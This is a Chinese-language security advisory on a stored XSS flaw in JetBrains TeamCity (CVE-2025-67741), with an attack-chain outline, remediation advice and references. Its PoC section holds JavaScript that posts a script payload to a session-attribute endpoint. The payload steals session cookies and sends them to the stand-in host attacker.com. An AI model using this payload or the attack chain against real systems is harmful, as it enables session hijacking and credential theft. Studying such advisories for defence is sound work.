CVE-2025-67741: JetBrains TeamCity 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67741

漏洞类型

存储型XSS

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

JetBrains TeamCity

漏洞概述

CVE-2025-67741是JetBrains TeamCity中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响TeamCity 2025.11之前的所有版本，攻击者可以通过会话属性（session attribute）注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问受污染的页面时，恶意代码会在其浏览器中执行。

此漏洞的CVSS评分为4.6，属于中等严重程度。攻击向量为网络（AV:N），需要低权限认证（PR:L），并需要用户交互（UI:R）。这意味着攻击者需要诱骗受害者访问特定页面才能触发漏洞。漏洞对机密性和完整性有低影响，对可用性无影响。

JetBrains TeamCity是一款流行的持续集成和持续部署（CI/CD）服务器，广泛应用于企业级软件开发环境中。由于TeamCity通常具有较高的访问权限，存储型XSS漏洞可能导致敏感信息泄露、会话劫持、恶意操作执行等严重后果。攻击者可能利用此漏洞窃取用户凭证、操纵构建流程或横向移动到其他系统。

该漏洞由[email protected]发现并报告，披露日期为2025年12月11日。JetBrains官方已在TeamCity 2025.11版本中修复了此问题。建议所有使用TeamCity的组织尽快升级到最新版本，并检查是否存在可疑的会话属性或用户数据。

技术细节

存储型XSS漏洞的技术原理在于应用程序对用户输入的验证和转义不充分，导致恶意脚本被永久存储在服务器端并在后续页面访问时执行。

在CVE-2025-67741中，问题出在JetBrains TeamCity的会话属性处理机制。攻击者可以通过以下方式利用此漏洞：

1. 身份认证：攻击者首先需要拥有TeamCity的有效账户（低权限即可），登录到TeamCity系统。

2. 恶意载荷注入：攻击者在会话属性中注入恶意JavaScript代码。由于TeamCity在处理会话属性时未对特殊字符进行充分转义，恶意代码被存储在服务器端。

3. 触发条件：当其他用户（管理员或普通用户）访问包含该会话属性的页面时，恶意JavaScript代码会在其浏览器上下文中执行。

4. 攻击效果：
- 窃取用户会话Cookie或认证令牌
- 读取页面内容获取敏感信息
- 模拟用户执行未授权操作
- 重定向用户到恶意网站
- 注入更复杂的攻击载荷

防御此类漏洞的关键措施包括：对所有用户输入进行严格的输入验证、对输出内容进行HTML实体编码、使用内容安全策略（CSP）、以及实施最小权限原则。TeamCity管理员应定期审计用户输入和会话数据，及时更新到安全版本。

攻击链分析

STEP 1

步骤1: 侦察与信息收集

攻击者识别目标TeamCity服务器版本，确认版本低于2025.11。通过公开信息或版本探测接口获取服务器指纹。

STEP 2

步骤2: 账户获取

攻击者获取TeamCity的有效用户账户（低权限账户即可）。可以通过社会工程、凭证填充、暴力破解或内部人员泄露获得。

STEP 3

步骤3: 恶意载荷构造

攻击者构造包含恶意JavaScript代码的XSS载荷。常见载荷包括：会话窃取、页面重定向、内容篡改、键盘记录等。

STEP 4

步骤4: 会话属性注入

通过TeamCity的会话属性设置接口，将恶意脚本注入到会话中。由于输入验证不足，恶意代码被存储在服务器端。

STEP 5

步骤5: 诱导用户访问

攻击者诱骗目标用户（管理员或其他用户）访问包含恶意会话属性的页面。可以通过发送链接、评论、构建通知等方式实施。

STEP 6

步骤6: 恶意代码执行

当受害用户访问受污染页面时，恶意JavaScript在其浏览器上下文中执行，导致会话劫持、信息泄露或进一步攻击。

STEP 7

步骤7: 持久化与横向移动

攻击者利用窃取的会话或权限，执行未授权操作、窃取敏感数据、修改构建配置或横向移动到其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67741 PoC - JetBrains TeamCity Stored XSS via Session Attribute
// This PoC demonstrates how an attacker can inject malicious JavaScript through session attributes

// Step 1: Login to TeamCity with a valid account
const teamcityUrl = 'https://teamcity.example.com';
const credentials = {
    username: 'attacker',
    password: 'password123'
};

// Step 2: Inject XSS payload into session attribute
// The payload will be stored and executed when other users view the affected page
const xssPayload = `<script>
    // Steal session cookies
    var cookies = document.cookie;
    
    // Send stolen data to attacker's server
    fetch('https://attacker.com/collect?data=' + btoa(cookies), {
        method: 'GET',
        mode: 'no-cors'
    });
    
    // Alternative payload: Session hijacking
    console.log('Session Hijacking - Cookie:', cookies);
</script>`;

// Step 3: Exploit function - inject payload into session attribute
async function exploitStoredXSS() {
    // Login to TeamCity
    const loginResponse = await fetch(`${teamcityUrl}/login.html`, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        },
        body: `username=${credentials.username}&password=${credentials.password}&submit=Login`
    });
    
    // Inject malicious session attribute
    // This targets the vulnerable session attribute parameter
    const injectResponse = await fetch(`${teamcityUrl}/app/session-attribute`, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Cookie': loginResponse.headers.get('Set-Cookie')
        },
        body: JSON.stringify({
            name: 'userDisplayName',
            value: xssPayload
        })
    });
    
    console.log('XSS payload injected successfully');
    console.log('Payload will execute when victims visit affected pages');
}

// Mitigation: Update to TeamCity 2025.11 or later
// The patch adds proper HTML encoding for session attributes
const mitigationNote = `
REMEDIATION:
1. Upgrade JetBrains TeamCity to version 2025.11 or later
2. Review user session attributes for suspicious content
3. Implement Content Security Policy (CSP) headers
4. Enable audit logging for session attribute modifications
`;

影响范围

JetBrains TeamCity < 2025.11

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制TeamCity的访问范围，仅允许受信任的IP地址访问管理界面；2）实施严格的会话管理策略，包括会话超时和会话绑定；3）启用HTTPOnly和Secure标志保护Cookie；4）在前端部署WAF规则检测和阻止XSS攻击特征；5）通知用户不要点击来自TeamCity的可疑链接；6）定期检查服务器日志和会话数据，查找异常的脚本注入迹象。但这些措施仅为临时方案，最终仍需升级到官方修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67741
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67741
3 Details https://www.cvedetails.com/cve/CVE-2025-67741/
4 VulDB https://vuldb.com/cve/CVE-2025-67741
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/